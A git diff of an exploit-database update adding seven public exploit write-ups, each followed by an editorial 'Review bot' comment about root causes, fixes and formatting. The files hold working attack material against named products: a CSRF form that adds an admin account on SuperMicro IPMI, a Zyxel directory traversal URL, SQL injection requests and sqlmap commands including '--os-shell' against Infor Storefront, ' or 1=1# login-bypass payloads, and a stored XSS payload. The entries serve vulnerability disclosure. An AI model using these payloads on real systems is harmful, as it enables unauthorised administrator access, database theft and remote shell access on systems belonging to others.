DB: 2020-07-16
8 changes to exploits/shellcodes

SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
Zyxel Armor X1 WAP6806 - Directory Traversal
Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
Online Polling System 1.0 - Authentication Bypass
Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
This commit is contained in:
parent
87c306bdc9
commit
8bb6bd8fb0
9 changed files with 238 additions and 0 deletions
28
exploits/hardware/webapps/48668.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
|
||||||
|
# Exploit Author: Metin Yunus Kandemir
|
||||||
|
# Date: 2020-07-15
|
||||||
|
# Vendor Homepage: https://www.supermicro.com/
|
||||||
|
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
||||||
|
# CVE: CVE-2020-15046
|
||||||
|
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
||||||
|
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
|
||||||
|
# The fixed versions are BIOS 3.2 and firmware 03.88.
|
||||||
|
|
||||||
|
# PoC :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
|
||||||
|
<input type="hidden" name="username" value="JOKER" />
|
||||||
|
<input type="hidden" name="original_username" value="2" />
|
||||||
|
<input type="hidden" name="password" value="onebadday" />
|
||||||
|
<input type="hidden" name="new_privilege" value="4" />
|
||||||
|
<input type="submit" value="submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
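Review bot: The description names cgi/config_user.cgi and the fixed firmware (03.88) but never states why the request is forgeable, which is what a reader needs for triage: the form shown carries only `username`, `original_username`, `password` and `new_privilege`, with no anti-CSRF token, so the request succeeds on the strength of the victim's existing IPMI browser session alone. Two header details also need attention: the hard-coded `original_username` value `2` is not explained, and this entry has no `# Tested on:` line while the other new entries in this commit carry one. Suggest adding a one-line root-cause statement (no CSRF token on the user-management form) and noting that the remedy is the listed update to BIOS 3.2 / firmware 03.88, with the IPMI web interface kept off networks that untrusted browsers can reach until then.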
|
21
exploits/hardware/webapps/48669.txt
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
|
||||||
|
# Date: 2020-06-19
|
||||||
|
# Exploit Author: Rajivarnan R
|
||||||
|
# Vendor Homepage: https://www.zyxel.com/
|
||||||
|
# Software [http://www.zyxelguard.com/WAP6806.asp]
|
||||||
|
# Version: [V1.00(ABAL.6)C0]
|
||||||
|
# CVE: 2020-14461
|
||||||
|
# Tested on: Linux Mint / Windows 10
|
||||||
|
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
|
||||||
|
|
||||||
|
# As a result of the research, one vulnerability identified.
|
||||||
|
# (Directory Traversal)
|
||||||
|
# Technical information is provided below step by step.
|
||||||
|
|
||||||
|
# [1] - Directory Traversal Vulnerability
|
||||||
|
|
||||||
|
# Vulnerable Parameter Type: GET
|
||||||
|
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
|
||||||
|
|
||||||
|
# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
|
||||||
|
<https://target/Zyxel/images/eaZy/>
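Review bot: The `# CVE:` line reads `2020-14461` without the `CVE-` prefix, unlike the other entries in this commit (`# CVE: CVE-2020-15046`), and the `# Vulnerable Parameter:` line gives a URL path with a stray trailing `]` rather than a parameter name, while `# Vulnerable Parameter Type: GET` is actually the HTTP method. The write-up also never says what the request to `/Zyxel/images/eaZy/` returns (a directory listing, file contents, or something else), so the impact of the 'Directory Traversal' cannot be judged from the text; suggest adding the observed response, and, since the header already has `# Date:`, dropping the duplicate `# Vulnerabilities Discovered Date` line.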
|
|
@ -6,6 +6,7 @@
|
||||||
# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
# Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
||||||
# Version: 1.0
|
# Version: 1.0
|
||||||
# Tested on: Windows 10
|
# Tested on: Windows 10
|
||||||
|
# CVE: CVE-2020-15599
|
||||||
|
|
||||||
Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
|
Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
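Review bot: This hunk has no file path in the rendered diff, so the entry receiving the added `# CVE: CVE-2020-15599` line can only be identified from the `# Software Link:` context (the VictorAlagwu/CMSsite archive); the commit message lists seven new entries and does not mention this CVE back-fill, so it should name the updated entry. Minor: the unchanged `Description:` context line says the two parameters 'is vulnerable' where 'are vulnerable' is meant and could be fixed in the same touch.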
|
||||||
|
|
||||||
|
|
36
exploits/php/webapps/48670.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
|
||||||
|
# Date: 2020-06-17
|
||||||
|
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||||
|
# Vendor Homepage: https://joomsky.com/
|
||||||
|
# Software Link: https://joomsky.com/products/js-jobs-pro.html
|
||||||
|
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
|
||||||
|
# Version: 1.3.0
|
||||||
|
# Tested on: Kali Linux - Apache2
|
||||||
|
|
||||||
|
Vulnerable param: sortby
|
||||||
|
-------------------------------------------------------------------------
|
||||||
|
POST /joomla/administrator/index.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://localhost/joomla/administrator/index.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 233
|
||||||
|
Connection: close
|
||||||
|
Cookie: COOKIES
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
|
||||||
|
|
||||||
|
|
||||||
|
-------------------------------------------------------------------------
|
||||||
|
sqlmap poc:
|
||||||
|
|
||||||
|
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
|
||||||
|
|
||||||
|
|
||||||
|
Mehmet KELEPÇE
|
||||||
|
|
||||||
|
Penetration Tester | Red Team
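Review bot: The request body contains both `js_sortby=4` and `sortby=asc`, while the header says only `Vulnerable param: sortby`, so it is unclear which field the sqlmap line's `-p sortby` actually refers to; name the field explicitly. If it is `sortby` (`asc`/`desc`), the value is a sort direction interpolated into an ORDER BY clause, which cannot be bound as a prepared-statement parameter; the application-side fix is to map it through an allow-list of the two accepted values rather than to concatenate it. Also, the title says 'J2 JOBS' while both vendor links point at 'JS Jobs' (`js-jobs-pro.html`, `js-jobs.html`), and `Cookie: COOKIES` and `-r jsjobs` (a saved request file) should be flagged as placeholders.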
|
46
exploits/php/webapps/48671.txt
Normal file
|
@ -0,0 +1,46 @@
|
||||||
|
# Exploit Title: Online Polling System 1.0 - Authentication Bypass
|
||||||
|
# Date: 2020-07-20
|
||||||
|
# Author: AppleBois
|
||||||
|
# Version: NULL
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
|
||||||
|
#
|
||||||
|
# Administration Control Panel || Authentication Bypass
|
||||||
|
# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
|
||||||
|
#
|
||||||
|
######################################################################################
|
||||||
|
#Vulnerable Code
|
||||||
|
#
|
||||||
|
#$myusername=$_POST['myusername'];
|
||||||
|
#$mypassword=$_POST['mypassword'];
|
||||||
|
#$encrypted_mypassword=md5($mypassword);
|
||||||
|
#
|
||||||
|
#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
|
||||||
|
#
|
||||||
|
#$count=mysqli_num_rows($result);
|
||||||
|
#
|
||||||
|
#if($count==1){
|
||||||
|
#
|
||||||
|
#$user = mysqli_fetch_assoc($result);
|
||||||
|
#$_SESSION['member_id'] = $user['member_id'];
|
||||||
|
#header("location:student.php");
|
||||||
|
#}
|
||||||
|
#
|
||||||
|
######################################################################################
|
||||||
|
|
||||||
|
|
||||||
|
POST /admin/checklogin.php HTTP/1.1
|
||||||
|
Host: 10.10.10.2:81
|
||||||
|
Content-Length: 53
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://10.10.10.2:81
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://10.10.10.2:81/online/index.php
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
myusername=' or 1=1#&mypassword=ad&Submit=Login
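Review bot: The code quoted in the `#Vulnerable Code` block only grants access when `$count==1`, so the `' or 1=1#` username in the request returns every row of `tbadministrators` and the check passes only when that table holds exactly one account; the advisory should state this precondition instead of presenting the bypass as unconditional. The `Cookie:` header is also full of unrelated ASP.NET/DotNetNuke values (`.ASPXANONYMOUS`, `.DOTNETNUKE`, `__RequestVerificationToken_...`) that have nothing to do with this PHP application and look like the tester's own browser state; trim it to `PHPSESSID`. Finally, `# Date: 2020-07-20` is later than this DB update (2020-07-16), 'Unthenticated' should be 'Unauthenticated', and the root cause is the string-built query on `/admin/checklogin.php`; the fix is a parameterised `mysqli` query with `password_hash`/`password_verify` in place of `md5`.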
|
36
exploits/php/webapps/48672.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
|
||||||
|
# Date: 2020-07-03
|
||||||
|
# Exploit Author: KeopssGroup0day,Inc
|
||||||
|
# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
|
||||||
|
# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-
|
||||||
|
booking-system
|
||||||
|
# Version: 0.1.0
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
|
||||||
|
Source code(localhost/admin/loginauth.php):
|
||||||
|
<?php
|
||||||
|
session_start();
|
||||||
|
|
||||||
|
$_SESSION['username'] = $_POST['username'];
|
||||||
|
$_SESSION['password'] = $_POST['password'];
|
||||||
|
|
||||||
|
include './auth.php';
|
||||||
|
$re = mysql_query("select * from user where
|
||||||
|
username = '".$_SESSION['username']."' AND password =
|
||||||
|
'".$_SESSION['password']."' " );
|
||||||
|
echo mysql_error();
|
||||||
|
if(mysql_num_rows($re) > 0)
|
||||||
|
{
|
||||||
|
header('Refresh: 0;url=dashboard.php');
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
|
||||||
|
session_destroy();
|
||||||
|
header("location: index.htm");
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
Payload:
|
||||||
|
Username: 1' or 1 = 1 LIMIT 1#
|
||||||
|
Password: 1' or 1 = 1 LIMIT 1#
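Review bot: The `# Software Link:` URL is broken across two lines (`.../Web-based-hotel-` then `booking-system`), so the header no longer contains a usable link; join it onto one line as the `# Vendor Homepage:` line already is. On the `loginauth.php` code shown: it uses the `mysql_*` extension (removed in PHP 7.0), copies the raw `username` and `password` from `$_POST` into `$_SESSION` before any check, compares passwords in plaintext, and prints `mysql_error()` into the response. The advisory could say that the fix is a prepared statement via `mysqli`/PDO with `password_verify` against a stored hash, and that the error echo should be removed.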
|
26
exploits/php/webapps/48673.txt
Normal file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
|
||||||
|
# Date: 2020-06-29
|
||||||
|
# Exploit Author: KeopssGroup0day,Inc
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
|
||||||
|
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
|
||||||
|
# Version: 0.1.0
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
|
||||||
|
Source code(review.php):
|
||||||
|
<?php
|
||||||
|
if($result) :
|
||||||
|
while($row1 = $result->fetch_array()) :
|
||||||
|
?>
|
||||||
|
<div class="con">
|
||||||
|
<div class="row">
|
||||||
|
<div class="col-sm-4">
|
||||||
|
<em style="color: black;"><?= $row1['comment']; ?></em>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
|
||||||
|
POC:
|
||||||
|
|
||||||
|
1. http://192.168.1.58/a/review.php?pid=31 go
|
||||||
|
2. We send the payload (<script>alert(1)</script>)
|
||||||
|
3. Write a review payload and submit
|
||||||
|
4. And refresh the page
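Review bot: The `review.php` excerpt stops after the first `</div>` and never shows the closing `endwhile`/`endif`, so the reader cannot tell whether the unescaped `<?= $row1['comment']; ?>` is the only sink in the loop; either show the full block or say so. The root cause visible in the hunk is that the stored comment is echoed without encoding, and the fix is `htmlspecialchars($row1['comment'], ENT_QUOTES, 'UTF-8')` at that output point. In the PoC, step 1 ('... go') should read 'Go to ...', and steps 2 and 3 describe the same action and can be merged.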
|
37
exploits/php/webapps/48674.txt
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
|
||||||
|
# Google Dork: inurl:storefrontb2bweb
|
||||||
|
# Date: 2020-06-27
|
||||||
|
# Exploit Author: ratboy
|
||||||
|
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
|
||||||
|
# Version: Infor Storefront
|
||||||
|
# Tested on: Windows All Versions
|
||||||
|
|
||||||
|
[POC Multiple Vulns]
|
||||||
|
|
||||||
|
python sqlmap.py -u
|
||||||
|
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
|
||||||
|
-p usr_name --dbms=mssql --level=5 --risk=3
|
||||||
|
--tamper=between,space2comment -o --random-agent --parse-errors
|
||||||
|
--os-shell --technique=ES
|
||||||
|
|
||||||
|
|
||||||
|
python sqlmap.py -u
|
||||||
|
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
|
||||||
|
-p itm_id --dbms=mssql --level=5 --risk=3
|
||||||
|
--tamper=between,space2comment -o --random-agent --parse-errors
|
||||||
|
--os-shell --technique=ES
|
||||||
|
|
||||||
|
|
||||||
|
or...
|
||||||
|
|
||||||
|
http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
|
||||||
|
INJECTION];--
|
||||||
|
|
||||||
|
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
|
||||||
|
INJECTION];--
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
Sincerly,
|
||||||
|
Aaron Schrom
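Review bot: The title and the files.csv entry name only `usr_name` in `storefrontB2BWEB/login.do`, but the body is headed `[POC Multiple Vulns]` and also covers `itm_id` in `storefrontB2CWEB/cart.do`, a different web application; either split this into two entries or broaden the title. `# Version: Infor Storefront` is a product name, not a version (the title says 1.0), 'Sincerly' should be 'Sincerely', and the sign-off (Aaron Schrom) does not match `# Exploit Author: ratboy`, which should be reconciled before the entry is published.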
|
|
@ -42915,3 +42915,10 @@ id,file,description,date,author,type,platform,port
|
||||||
48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
|
48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
|
||||||
48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
|
48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
|
||||||
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
|
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
|
||||||
|
48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware,
|
||||||
|
48669,exploits/hardware/webapps/48669.txt,"Zyxel Armor X1 WAP6806 - Directory Traversal",2020-07-15,"Rajivarnan R",webapps,hardware,
|
||||||
|
48670,exploits/php/webapps/48670.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-15,"Mehmet Kelepçe",webapps,php,
|
||||||
|
48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,
|
||||||
|
48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
|
||||||
|
48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
|
||||||
|
48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
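Review bot: The new row for 48671 records `2020-07-15`, but the file header in this commit says `# Date: 2020-07-20`, which is also after the DB date 2020-07-16 in the commit message; one of the two should be corrected. The author for 48672 and 48673 is written `KeopssGroup0day_Inc` here while the files say `KeopssGroup0day,Inc`; since the CSV already quotes multi-word authors ("William Summerhill", "Mehmet Kelepçe"), the name can be kept verbatim by quoting it instead of substituting the comma.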
|
||||||
|
|